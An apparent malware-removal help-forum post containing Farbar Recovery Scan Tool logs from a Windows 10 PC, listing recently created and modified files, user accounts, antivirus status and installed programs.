2021-01-20 16:58 - 2021-01-20 16:59 - 000000000 ____D C:\AdwCleaner
2021-01-20 16:57 - 2021-01-20 16:55 - 008458096 _____ (Malwarebytes) C:\Users\IRENA-PC\Desktop\adwcleaner_8.0.9.exe
2021-01-20 09:32 - 2017-07-12 23:48 - 000112696 _____ (e2eSoft) C:\WINDOWS\system32\Drivers\VAud_WDM.sys
2021-01-20 09:02 - 2021-01-20 09:03 - 000433944 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-20 08:46 - 2021-01-20 08:46 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\ProgramData\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2021-01-20 08:16 - 2021-01-20 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GridinSoft Anti-Malware
2021-01-20 08:16 - 2021-01-20 08:16 - 000000000 ____D C:\ProgramData\GridinSoft
2021-01-20 07:13 - 2021-01-20 18:05 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 19:43 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 18:05 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 19:39 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 19:38 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-20 19:33 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-20 19:33 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-20 19:33 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-20 19:33 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-20 19:28 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-20 19:28 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-20 19:28 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-20 19:27 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-20 19:21 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-20 13:09 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-20 12:56 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-20 11:10 - 2017-03-10 18:17 - 000044146 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-20 10:02 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-20 09:46 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-20 08:48 - 2018-05-16 16:28 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Kryptex
2021-01-20 08:17 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp

==================== Files in the root of some directories ========

2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

chenny
Visitor
Posts: 36
Registered: 06 Sep 2007 09:50

Re: Please check my log

#11 Post by chenny »

ADDITION log

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 19:46:07)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
